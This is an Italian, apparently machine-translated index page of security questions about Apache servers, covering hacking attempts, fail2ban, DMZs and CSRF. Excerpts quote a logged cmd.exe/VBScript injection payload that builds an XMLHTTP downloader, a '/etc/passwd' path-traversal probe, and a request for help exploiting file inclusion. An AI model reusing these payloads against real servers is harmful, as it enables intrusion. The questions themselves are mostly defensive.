Domande con tag 'apache'

domande con tag
1
risposta

Questo nuovo tentativo di hacking è qualcosa di cui preoccuparsi?

- - [22/Sep/2014:13:54:24 -0600] "GET /?search==%00{.exec|cmd.exe +%2Fc +echo%3E22222.vbs +dim +wait%2Cquit%2Cout%3ASet +xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%3ASet +WshShell +%3D+Wscript.CreateObject%28%22WScript.Shell%22%29 +%3ADS%3D...
posta 23.09.2014 - 21:08
1
risposta

Impedisci le manipolazioni URL incluso / proc e / etc con fail2ban

Ottengo molti attacchi al mio server debian Apache che include manipolazioni di URL come http://url_on_my_eserver/?username=/etc/passwd Come posso bloccare questi attacchi?     
posta 17.12.2012 - 13:42
1
risposta

Come sfruttare una vulnerabilità legata all'inclusione di file locali in un server Solaris [chiuso]

Sto cercando di sfruttare una vulnerabilità di inclusione locale dei file su un server Solaris per il mio corso sulla sicurezza. Il server esegue Apache2 tramite CoolStack. Qual è il file che ho bisogno di aprire? Gli esempi che ho visto finora...
posta 29.10.2012 - 06:30
1
risposta

Un proxy inverso può proteggere dall'exploit del server web? [chiuso]

Sto cercando una soluzione di sicurezza per il mio server web Apache in ambiente Windows per servizi autenticati pubblicati su Internet, non riesco a configurare una DMZ perché è pesantemente connessa a tutti gli altri server di quella rete....
posta 30.08.2017 - 08:30
1
risposta

Come configurare Apache per risolvere "Scripting crossframe mancante mancante" mediante scansione app [chiusa]

C'è un server Apache che ospita alcuni siti Web scritti in PHP ed è accessibile tramite internet. Come configurare l'apache per risolvere "Missing Cross-Scripting Defense mancante" e l'avviso "Missing Cross-Scripting Defense mancante" può essere...
posta 04.09.2015 - 08:21
1
risposta

Qual è la comunicazione più sicura tra firewall e DMZ

Ho 2 macchine virtuali. (Vmware esxi 6) Sono entrambi opensuse 42.3 (tumbleweed) Firewall (solo iptables, ipset, dhcpd, dns) mail / web server. (Apache, colombaia, postfix) Il server web non può comunicare con il firewall, tranne che...
posta 15.06.2017 - 20:00
1
risposta

Attacco di falsificazione della richiesta tra i siti. Come possiamo fermarlo? [chiuso]

Su uno dei nostri siti web, stiamo vedendo che questo codice si sta aggiungendo. Ho provato a capire, ma senza successo. Una cosa che ho notato quando ho rimosso i tag html, head e body iniziali, non c'è più. Il nostro sito Web è su wordpress...
posta 24.06.2013 - 14:39
2
risposte

attacco alla porta 80 [chiuso]

Ho un server di istanza ec2 ubuntu che ospita il sito apache2 & tomcat7 al back end. Secondo i registri di apache ho dubbi sull'attacco malevolo! Per favore qualcuno può confermarlo e amp; cosa posso fare per fermarlo? Ho scoperto che que...
posta 19.11.2015 - 11:38
2
risposte

È possibile interrompere il trasferimento di un certificato SSL tra i server? [chiuso]

Da quello che ho letto sembra che il certificato non sia un grosso problema dal momento che è già pubblico e scaricato da ogni browser, tuttavia se qualcuno trova il tuo file chiave, allora hai un problema.     
posta 17.11.2015 - 20:44
1
risposta

Usando uno script index.php nella mia app iOS, cosa devo fare per proteggerlo?

Sono davvero nuovo usando i server Web e la sicurezza. Ho appena scritto un back-end per la mia app iOS in PHP. È ospitato su un server Apache Linode. L'index.php si trova all'indirizzo link . Mi sto solo chiedendo cosa dovrei fare per assicura...
posta 31.07.2015 - 15:03